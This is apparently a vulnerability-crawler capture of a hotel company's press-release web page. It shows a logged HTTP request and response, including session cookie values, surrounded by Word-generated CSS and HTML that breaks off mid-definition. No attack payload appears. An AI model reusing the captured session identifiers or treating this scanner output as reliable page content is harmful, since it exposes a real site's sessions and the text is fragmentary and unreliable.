p.MsoHeader, li.MsoHeader, div.MsoHeader
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.0in right 6.0in;
font-size:11.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
p.MsoFooter, li.MsoFooter, div.MsoFooter
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.0in right 6.0in;
font-size:11.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
span.MsoCommentReference
{mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;}
p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
line-height:200%;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;
text-underline:single;}
strong
{mso-bidi-font-weight:bold;}
p.MsoDocumentMap, li.MsoDocumentMap, div.MsoDocumentMap
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
background:navy;
font-size:10.0pt;
font-family:Tahoma;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Tahoma;}
p.MsoPlainText, li.MsoPlainText, div.MsoPlainText
{mso-style-noshow:yes;
mso-style-link:"Plain Text Char";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.5pt;
font-family:"Times New Roman";
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-bidi-font-family:"Times New Roman";}
p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject
{mso-style-noshow:yes;
mso-style-parent:"Comment Text";
mso-style-next:"Comment Text";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";
font-weight:bold;}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Tahoma;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Tahoma;}
span.Heading1Char
{mso-style-name:"Heading 1 Char";
mso-style-locked:yes;
mso-style-link:"Heading 1";
mso-ansi-font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";
mso-font-kerning:18.0pt;
mso-ansi-language:EN-US;
mso-fareast-language:EN-US;
font-weight:bold;
mso-bidi-font-weight:normal;}
span.PlainTextChar
{mso-style-name:"Plain Text Char";
mso-style-noshow:yes;
mso-style-locked:yes;
mso-style-link:"Plain Text";
mso-ansi-font-size:10.5pt;
mso-bidi-font-size:10.5pt;
font-family:Consolas;
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-ansi-language:EN-US;
mso-fareast-language:EN-US;}
p.CharChar1CharChar, li.CharChar1CharChar, div.CharChar1CharChar
{mso-style-name:" Char Char1 Char Char";
margin-top:0in;
margin-right:0in;
margin-bottom:8.0pt;
margin-left:0in;
text-align:justify;
line-height:12.0pt;
mso-line-height-rule:exactly;
mso-pagination:none;
mso-layout-grid-align:none;
font-size:10.0pt;
font-family:Arial;
mso-ascii-font-family:"Times New Roman";
mso-fareast-font-family:"Times New Roman";
mso-hansi-font-family:"Times New Roman";
mso-bidi-font-family:Arial;
mso-ansi-language:DE-CH;}
/* Page Definitions */
@page
{mso-footnote-separator:url(":images:header.htm") fs;
mso-footnote-continuation-separator:url(":images:header.htm") fcs;
mso-endnote-separator:url(":images:header.htm") es;
mso-endnote-continuation-separator:url(":images:header.htm") ecs;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;
mso-header-margin:.5in;
mso-footer-margin:.5in;
mso-paper-source:0;}
div.Section1
{page:Section1;}
/* List Definitions */
@list l0
{mso-list-id:762846213;
mso-list-type:hybrid;
mso-list-template-ids:737695120 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l0:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l1
{mso-list-id:1241058028;
mso-list-type:hybrid;
mso-list-template-ids:1236678956 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l1:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l2
{mso-list-id:1319529687;
mso-list-type:hybrid;
mso-list-template-ids:2038327704 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l2:level1
{mso-level-number-format:bullet;
mso-level-text:\F0FC;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l2:level2
{mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l2:level3
{mso-level-tab-stop:1.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l2:level4
{mso-level-tab-stop:2.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l2:level5
{mso-level-tab-stop:2.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l2:level6
{mso-level-tab-stop:3.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l2:level7
{mso-level-tab-stop:3.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l2:level8
{mso-level-tab-stop:4.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l2:level9
{mso-level-tab-stop:4.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3
{mso-list-id:1851023485;
mso-list-type:hybrid;
mso-list-template-ids:-1010268010 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l3:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l4
{mso-list-id:2057967201;
mso-list-type:hybrid;
mso-list-template-ids:-2130538154 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l4:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l4:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:"Courier New";}
ol
{margin-bottom:0in;}
ul
{margin-bottom:0in;}
-->
</style>
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="2050"/>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout></xml><![endif]-->
</head>

<body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'>

<div class=Section1>

<p class=MsoNormal><span style='font-family:Arial;mso-fareast-font-family:Times;
mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
filled="f" stroked="f">
<v:stroke joinstyle="miter"/>
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
<v:f eqn="sum @0 1 0"/>
<v:f eqn="sum 0 0 @1"/>
<v:f eqn="prod @2 1 2"/>
<v:f eqn="prod @3 21600 pixelWidth"/>
<v:f eqn="prod @3 21600 pixelHeight"/>
<v:f eqn="sum @0 0 1"/>
<v:f eqn="prod @6 1 2"/>
<v:f eqn="prod @7 21600 pixelWidth"/>
<v:f eqn="sum @8 21600 0"/>
<v:f eqn="prod @7 21600 pixelHeight"/>
<v:f eqn="sum @10 21600 0"/>
</v:formulas>
<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style='width:171pt;
height:1in' o:ole="">
<v:imagedata src="images/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=173 height=74
src="images/image002.gif" v:shapes="_x0000_i1025"><![endif]><!--[if gte mso 9]><xml>
<o:OLEObject Type="Embed" ProgID="Photoshop.Image.6" ShapeID="_x0000_i1025"
DrawAspect="Content" ObjectID="_1190291612">
<o:WordFieldCodes>\s</o:WordFieldCodes>
</o:OLEObject>
</xml><![endif]--></span><b style='mso-bidi-font-weight:normal'><span
style='font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></b></p>

<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
style='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p>

<p class=MsoNormal style='mso-outline-level:1'><b style='mso-bidi-font-weight:
normal'><span style='font-size:16.0pt;font-family:Arial;mso-bidi-font-family:
Arial'>FOR IMMEDIATE RELEASE<o:p></o:p></span></b></p>

<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
style='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p>

<p class=MsoNormal><i style='mso-bidi-font-style:normal'><span
style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:
Arial'>Media Contacts:..
- /pdfs/press/html/KIT-1009/index.html

/pdfs/press/html/KIT-1009/index.html

http://www.kimptonhotels.com/pdfs/press/html/KIT-1009/index.html

Request

GET /pdfs/press/html/KIT-1009/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 38320
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=windows-1252"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><link rel=OLE-Object-Data href="images/oledata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>6</o:TotalTime> <o:LastPrinted>2009-10-05T18:51:00Z</o:LastPrinted> <o:Created>2009-10-20T21:52:00Z</o:Created> <o:LastSaved>2009-10-20T21:52:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>784</o:Words> <o:Characters>4470</o:Characters> <o:Lines>37</o:Lines> <o:Paragraphs>8</o:Paragraphs> <o:CharactersWithSpaces>5489</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}h2 {mso-style-next:Normal; margin-top:12.0pt; margin-right:0in; margin-bottom:3.0pt; margin-left:0in; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:2; font-size:14.0pt; font-family:Arial; mso-bidi-font-family:Arial; mso-bidi-font-weight:bold; font-style:italic;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}em {mso-bidi-font-style:italic;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;}span.emailstyle17 {mso-style-name:emailstyle17; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:windowtext;}span.kim10 {mso-style-name:kim10;}p.p12, li.p12, div.p12 {mso-style-name:p12; mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}span.MarlieseEngel {mso-style-name:"Marliese Engel"; mso-style-noshow:yes; mso-ansi-font-size:11.0pt; mso-bidi-font-size:11.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black; font-weight:normal; font-style:normal; text-decoration:none; text-underline:none; text-decoration:none; text-line-through:none;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:1007153; mso-list-type:hybrid; mso-list-template-ids:-1871125328 1670048874 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; mso-ansi-font-size:8.0pt; font-family:Symbol;}@list l2 {mso-list-id:102651134; mso-list-type:hybrid; mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l3 {mso-list-id:154613679; mso-list-type:hybrid; mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4 {mso-list-id:533346185; mso-list-type:hybrid; mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}@list l4:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5 {mso-list-id:762846213; mso-list-type:hybrid; mso-list-template-ids:737695120 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l6 {mso-list-id:973101145; mso-list-type:hybrid; mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l7 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Symbol;}@list l7:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8 {mso-list-id:1089353841; mso-list-template-ids:-304692582;}@list l8:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Wingdings;}@list l8:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9 {mso-list-id:1212839367; mso-list-type:hybrid; mso-list-template-ids:1587200068 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l9:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l9:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10 {mso-list-id:1488857345; mso-list-type:hybrid; mso-list-template-ids:-1802839462 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l10:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l10:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; 